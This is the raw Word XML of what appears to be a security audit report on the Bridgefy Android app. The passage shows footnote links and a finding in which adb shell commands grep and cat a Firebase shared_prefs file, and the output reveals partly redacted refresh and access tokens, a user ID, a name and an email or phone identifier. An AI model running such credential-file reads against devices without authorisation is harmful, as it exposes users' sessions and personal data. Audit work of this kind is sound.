          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487628800">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>293373</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="107" name="Graphic 107"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="107" name="Graphic 107"/>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23.100245pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15687680;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape80" coordorigin="1440,462" coordsize="2880,0" path="m1440,462l4320,462e" filled="false" stroked="true" strokeweight=".75pt" strokecolor="#000000">
                <v:path arrowok="t"/>
                <v:stroke dashstyle="solid"/>
                <w10:wrap type="topAndBottom"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="110"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>163</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="66"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId250">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://docs.aws.amazon.com/config/latest/developerguide/alb-http-drop-invalid-header(...).html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>164</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId251">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://docs.aws.amazon.com/waf/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>165</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId252">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://developer.android.com/training/articles/keystore</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>166</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="17"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId253">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://www.cvedetails.com/vulnerability-list.php?vendor_id=1224&amp;product_id=19997...</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>167</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId254">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://developer.android.com/topic/security/data</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Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>adb </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="720" w:right="4802" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/data/data/me.bridgefy.main.staging/ grep -iR token</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="81"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[...]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="5371" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="31"/>
        <w:ind w:left="720" w:right="475" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>./shared_prefs/com.google.firebase.auth.api.Store.W0RFRkFVTFRd+MToxMDUyMTg5MzQyMjQ1OmFu ZHJvaWQ6NDE5MmI3NTcyYzRmYjMzMWU4OWRjYw.xml:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;string</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>name=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"com.google.firebase.auth.FIREBASE_USER"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;{&amp;qu[...]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="5371" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="720" w:right="475" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>./shared_prefs/com.google.firebase.auth.api.Store.W0RFRkFVTFRd+MToxMDUyMTg5MzQyMjQ1OmFu ZHJvaWQ6NDE5MmI3NTcyYzRmYjMzMWU4OWRjYw.xml:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;string</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="363" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>name=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"com.google.firebase.auth.GET_TOKEN_RESPONSE.5ZCxNZV6psRwknk6w9B9brLcZxw2"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;[...] [...]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="5866" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="3159" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>./shared_prefs/com.google.android.gms.appid.xml:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;string name=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"|T|1052189342245|*"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;{&amp;quot;token&amp;quot;:&amp;quot;fxIFU</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="81"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>./shared_prefs/com.google.firebase.auth.api.Store.W0RFRkFVTFRd+MToxMDUyMTg5MzQyMjQ1OmFu ZHJvaWQ6NDE5MmI3NTcyYzRmYjMzMWU4OWRjYw.xml</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="81"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>xml version=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'1.0' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>encoding=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'utf-8' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>standalone=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'yes' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>map</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1115" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="31"/>
        <w:ind w:left="720" w:right="388" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"com.google.firebase.auth.FIREBASE_USER"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;{&amp;quot;cachedTokenState&amp;quot;:&amp;quot;{\&amp;qu ot;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>refresh_token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[...]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>AOkP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[...];</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>access_token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>\[...];</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>eyJhbGciOiJSUz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[...];com.google.fireba se.auth.internal.DefaultFirebaseUser&amp;quot;,&amp;quot;userInfos&amp;quot;:[&amp;quot;{\&amp;quot;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>userId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>\ &amp;quot;:\&amp;quot;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>U309RRQIulX95ChRjWv16PqwFlp1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>\&amp;quot;,\&amp;quot;providerId\&amp;quot;:\&amp;quot;fireb ase\&amp;quot;,\&amp;quot;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>displayName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>\&amp;quot;:\&amp;quot;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Oscar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>\&amp;quot;,\&amp;quot;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>email</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>\&amp;quot;:\&amp;quot;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>+12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>064512559@bridgefy.app</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>\&amp;quot;,\&amp;quot;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>phoneNumber</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>\&amp;quot;:\&amp;quot;</w:t>
